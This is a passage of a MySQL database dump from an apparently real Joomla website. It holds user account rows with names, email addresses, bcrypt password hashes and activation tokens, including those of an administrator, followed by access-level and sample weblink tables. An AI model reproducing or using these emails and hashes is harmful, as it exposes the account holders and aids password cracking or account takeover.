encrypted keys', `otep` varchar(1000) NOT NULL default '' COMMENT 'One time emergency passwords', `requireReset` tinyint(4) NOT NULL default '0' COMMENT 'Require user to reset password on next login', PRIMARY KEY (`id`), KEY `idx_name` (`name`), KEY `idx_block` (`block`), KEY `username` (`username`), KEY `email` (`email`) ) ENGINE=InnoDB AUTO_INCREMENT=760 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_users` -- LOCK TABLES `fit_users` WRITE; /*!40000 ALTER TABLE `fit_users` DISABLE KEYS */; INSERT INTO `fit_users` VALUES (736,'Super User','admin','mohammedj@fitoman.com','$2y$10$.45lvEf2QrIcAoPjN29UnO7lIiUbDWZiSellEChjQvC/tOAjbJ3me',0,1,'2015-03-11 21:33:18','2016-04-03 05:44:34','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0),(738,'Selena Mascorro','selenamascorro901562','sashawarfelxb4358@yahoo.com','$2y$10$r58loboJhfYLQrwSX.fmwuZMqsYwYK1l1m6dZzHKzBOfosky7igVG',1,0,'2015-07-09 13:22:54','0000-00-00 00:00:00','8fe56676be110fe6c4fd18f360b3b586','{}','0000-00-00 00:00:00',0,'','',0),(739,'Epifania Adey','bgiepifania84937','critlerbrese1982@zobaczsobie.pl','$2y$10$GqLJ1oLYalhLK.9OSxD8UOcBioe8uD2BivuJOZlub88MNShzBwov6',1,0,'2015-08-06 22:12:03','0000-00-00 00:00:00','da188017fd0a81658679e7a73e8b7c7d','{}','0000-00-00 00:00:00',0,'','',0),(740,'Tamela Cullen','tamelacullen97589020','neninimind1978@zobaczsobie.pl','$2y$10$PZ8GcJpmJXpAbe3UalipheLhC9RbfwpLX21rLpGX/6MEgYP0.VSta',1,0,'2015-08-07 03:07:36','0000-00-00 00:00:00','1c882c1eb8a87ebf9689370337c39897','{}','0000-00-00 00:00:00',0,'','',0),(741,'Viola Williford','violawilliford0','alrantade1975@zobaczsobie.pl','$2y$10$HKnyIgyUWh8kphACXD8LzelIXlrSP/LK3pQ0ePGEIDAKhgvToG1qG',1,0,'2015-08-07 06:10:52','0000-00-00 00:00:00','6f8d5789b449e1cd06987cbbdc3a878c','{}','0000-00-00 00:00:00',0,'','',0),(742,'Della Tait','dellabjt274777947','eleanorglaabwj6240@yahoo.com','$2y$10$RP6nFOkJRYXa7UDzFGS1jeIR67gbaqHkg6W2lHmiRKm5aXMtQptCK',1,0,'2015-08-08 10:33:44','0000-00-00 00:00:00','3689d32e21a255ed52aa09012eba1218','{}','0000-00-00 00:00:00',0,'','',0),(743,'Vulls J00ML4','cutia','somentelinks2@gmail.com','$2y$10$rc/mhtwe226LoIUV3qtn0u1nnbc9X9/ZdPwNGdAgHosNmAmgU1cs6',1,0,'2015-08-20 04:51:43','0000-00-00 00:00:00','23382c087b09f7b588ff921aff685af3','{}','0000-00-00 00:00:00',0,'','',0),(744,'Vulls J00ML4','jbug','hectorbonilha2018@gmail.com','$2y$10$GZ3ALBTv5J9q2d8dAIvMN.KqI68KWI.ndJGNqHkA5I5mFQZ8dJGZS',1,0,'2015-08-20 09:24:15','0000-00-00 00:00:00','72ec315a89680193b8aa083c34c647c4','{}','0000-00-00 00:00:00',0,'','',0),(745,'PhilSeat','PhilSeat','info-mail@newmedicforum.com','$2y$10$EoBCT32P6jwC8Siz5CUtJuCjUTgDNAllHhheJp82I82Gn8J4KgBUW',1,0,'2015-11-07 18:50:43','0000-00-00 00:00:00','a8ec268d0f1cecc32c8b3b5cf8f42f8d','{}','0000-00-00 00:00:00',0,'','',0),(746,'Hatthewkn','Hatthewkn','viklamas@yandex.com','$2y$10$SLGGZi3WorQrM5kpvHO9b.27uAJ8HLDyxOGZv/lmlDDhM4RIPZAq2',1,0,'2015-11-23 13:09:53','0000-00-00 00:00:00','d911ce6136f39d65bdbfd18c049d97b1','{}','0000-00-00 00:00:00',0,'','',0),(747,'generic cialis','generic cialis','vibnamer@yandex.com','$2y$10$STWtQQ2k3tLI0r3Xo14K/ukKeiOJDH5zI6rJOewGknel5FkF4e8H6',1,0,'2015-11-24 02:20:23','0000-00-00 00:00:00','224b7063525a2ad8eca54979a44d8637','{}','0000-00-00 00:00:00',0,'','',0),(748,'spiderglomxx','spiderglomxx','spiderglomxx@mail.ru','$2y$10$RMsRfs9S3DRbnjDhg6dZXuXeBMQjhVdhFrZVOa1zuPIhUX4qHSgKy',1,0,'2015-12-20 13:56:11','0000-00-00 00:00:00','97e4654d2f9b3f3d209fae4da3812994','{}','0000-00-00 00:00:00',0,'','',0),(749,'Nelsonsymn','Nelsonsymn','psrpsrms@mail.ru','$2y$10$yrBbPJ4ox6pih8Xem9gu1OXdriX7BuWYR3A2J90T/OBf57Py8OpDu',1,0,'2015-12-23 10:21:41','0000-00-00 00:00:00','2c3b10ccc77246f5196393e303610ffa','{}','0000-00-00 00:00:00',0,'','',0),(750,'wpisyk2wpisy','wpisyk2wpisy','carissa32@creubenk.eu','$2y$10$EZlRbnL0hmpNATq3FgEYI.10y9eTCZb6dExPerPpEdTYjWay4m7hG',1,0,'2016-02-07 22:30:03','0000-00-00 00:00:00','4e062d2d4951d114a30099a1a0047676','{}','0000-00-00 00:00:00',0,'','',0),(751,'joomlacom','joomlacom','vipsamarin@mail.ru','$2y$10$X.Fyq.3RLZ0w5KKvuXpipuD3JTXW/gO0iXnxJn4fObaooqNfp3tBK',1,0,'2016-02-19 08:51:27','0000-00-00 00:00:00','e5a18e4a8def6bb6b6afe8f87d1b4725','{}','0000-00-00 00:00:00',0,'','',0),(752,'Hollis Coley','holliscoley7181922782','sueann937@cglendek.eu','$2y$10$jVg6AakDErXB63dwsIoVveH6ePCiAuNnpUZhEX7zC7TfrW9eFNxSS',1,0,'2016-02-25 01:56:06','0000-00-00 00:00:00','cbc52e38c1e3d9a7671bc8f111de847d','{}','0000-00-00 00:00:00',0,'','',0),(753,'Claysonkep','Claysonkep','kicvalis@yandex.com','$2y$10$307FGnmWLD7mC27AXHv1MeUzkoeHKc32Npu2MiO3GR2.caQYIhO8K',1,0,'2016-03-19 08:27:31','0000-00-00 00:00:00','51964a4256001b1f1aa6f8d9e2434064','{}','0000-00-00 00:00:00',0,'','',0),(754,'BosaldKili','BosaldKili','bunsomut@yandex.com','$2y$10$XLrmZEbTcOqRjUebI07NxuLRZh3Ityeli2MqRZYxRtiICHq3Ain66',1,0,'2016-04-09 06:02:03','0000-00-00 00:00:00','49f8cb5c4d619502b00018081ac0d23f','{}','0000-00-00 00:00:00',0,'','',0),(755,'What is cash advance interest rbc','FakaHooPin','etkaderpolift@yandex.com','$2y$10$Di.uqvhzKKLL7pYk4actQe1K59e94rM6tu/K4aCtn7/EM83WD1W9e',1,0,'2016-04-22 08:14:30','0000-00-00 00:00:00','403f7597949ed945db010d9b20be35d9','{}','0000-00-00 00:00:00',0,'','',0),(756,'Kotofeichdum','Kotofeichdum','nikitos.khvalebin@mail.ru','$2y$10$.hMquccZqOxIp60.V/hYTesTJ5ema.s/AkHECkax85bYelKzT5dU.',1,0,'2016-05-03 22:51:06','0000-00-00 00:00:00','4a2814c6d095b766c1a522dc062a314e','{}','0000-00-00 00:00:00',0,'','',0),(757,'DhdiTaiton','DhdiTaiton','oqomumyy75@mail.ru','$2y$10$tWjO9MImvo332qYQQCz6X.GVVGQpJfp4oeFEvAzCD7nRzRxLUWXlC',1,0,'2016-05-21 07:35:18','0000-00-00 00:00:00','69b67ca23dbb381fad289a225f13251e','{}','0000-00-00 00:00:00',0,'','',0),(758,'MarcosSaus','MarcosSaus','taifipon@rambler.ru','$2y$10$cID.yEfBwnHLcSvSUyldvuIh974z0HzsFGgNRfkoOz9nhKPsWXMMu',1,0,'2016-06-08 14:22:44','0000-00-00 00:00:00','ff0e60fc8e261dd565f62f42e9f31309','{}','0000-00-00 00:00:00',0,'','',0),(759,'tozipsobgf','tozipsobgf','tozipsoo@yandex.com','$2y$10$WY7pGENnWnczAdeHVpcDee9wwduMaR71cXDID5W4xt1H5zgI5RVci',1,0,'2016-09-24 14:40:25','0000-00-00 00:00:00','c06736e42cb9120ac9597c6c3d88917e','{}','0000-00-00 00:00:00',0,'','',0); /*!40000 ALTER TABLE `fit_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_viewlevels` -- DROP TABLE IF EXISTS `fit_viewlevels`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_viewlevels` ( `id` int(10) unsigned NOT NULL auto_increment COMMENT 'Primary Key', `title` varchar(100) NOT NULL default '', `ordering` int(11) NOT NULL default '0', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_assetgroup_title_lookup` (`title`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_viewlevels` -- LOCK TABLES `fit_viewlevels` WRITE; /*!40000 ALTER TABLE `fit_viewlevels` DISABLE KEYS */; INSERT INTO `fit_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]'),(4,'Customer Access Level',3,'[6,3,12]'); /*!40000 ALTER TABLE `fit_viewlevels` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_weblinks` -- DROP TABLE IF EXISTS `fit_weblinks`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_weblinks` ( `id` int(10) unsigned NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `title` varchar(250) NOT NULL default '', `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `url` varchar(250) NOT NULL default '', `description` text NOT NULL, `hits` int(11) NOT NULL default '0', `state` tinyint(1) NOT NULL default '0', `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `access` int(11) NOT NULL default '1', `params` text NOT NULL, `language` char(7) NOT NULL default '', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Set if link is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `version` int(10) unsigned NOT NULL default '1', `images` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_weblinks` -- LOCK TABLES `fit_weblinks` WRITE; /*!40000 ALTER TABLE `fit_weblinks` DISABLE KEYS */; INSERT INTO `fit_weblinks` VALUES (1,32,'Joomla!','joomla','http://www.joomla.org','<p>Home of Joomla!</p>',3,1,0,'0000-00-00 00:00:00',1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(2,33,'php.net','php','http://www.php.net','<p>The language that Joomla! is developed in</p>',6,1,0,'0000-00-00 00:00:00',1,1,'{\"target\":\"\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(3,33,'MySQL','mysql','http://www.mysql.com','<p>The database that Joomla! uses</p>',1,1,0,'0000-00-00 00:00:00',2,1,'{\"target\":\"\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(4,32,'OpenSourceMatters','opensourcematters','http://www.opensourcematters.org','<p>Home of OSM</p>',11,1,0,'0000-00-00 00:00:00',3,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(5,32,'Joomla! - Forums','joomla-forums','http://forum.joomla.org','<p>Joomla! Forums</p>',4,1,0,'0000-00-00 00:00:00',2,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(6,33,'Ohloh Tracking of Joomla!','ohloh-tracking-of-joomla','http://www.ohloh.net/projects/20','<p>Objective reports from Ohloh about Joomla\'s development activity. Joomla! has some star developers with serious kudos.</p>',1,1,0,'0000-00-00 00:00:00',3,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(7,31,'Baw Baw National Park','baw-baw-national-park','http://www.parkweb.vic.gov.au/1park_display.cfm?park=44','<p>Park of the Austalian Alps National Parks system, Baw Baw features sub alpine vegetation, beautiful views, and opportunities for hiking, skiing and other outdoor activities.</p>',1,1,0,'0000-00-00 00:00:00',1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(8,31,'Kakadu','kakadu','http://www.environment.gov.au/parks/kakadu/index.html','<p>Kakadu is known for both its cultural heritage and its natural features. It is one of a small number of places listed as World Heritage Places for both reasons. Extensive rock art is found there.</p>',0,1,0,'0000-00-00 00:00:00',2,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,''),(9,31,'Pulu Keeling','pulu-keeling','http://www.environment.gov.au/parks/cocos/index.html','<p>Located on an atoll 2000 kilometers north of Perth, Pulu Keeling is Australia\'s smallest national park.</p>',0,1,0,'0000-00-00 00:00:00',3,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','2010-07-10 23:44:03','0000-00-00 00:00:00',1,''); /*!40000 ALTER TABLE `fit_weblinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database 'fit' -- DELIMITER ;; DELIMITER ; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2017-07-14 11:12:43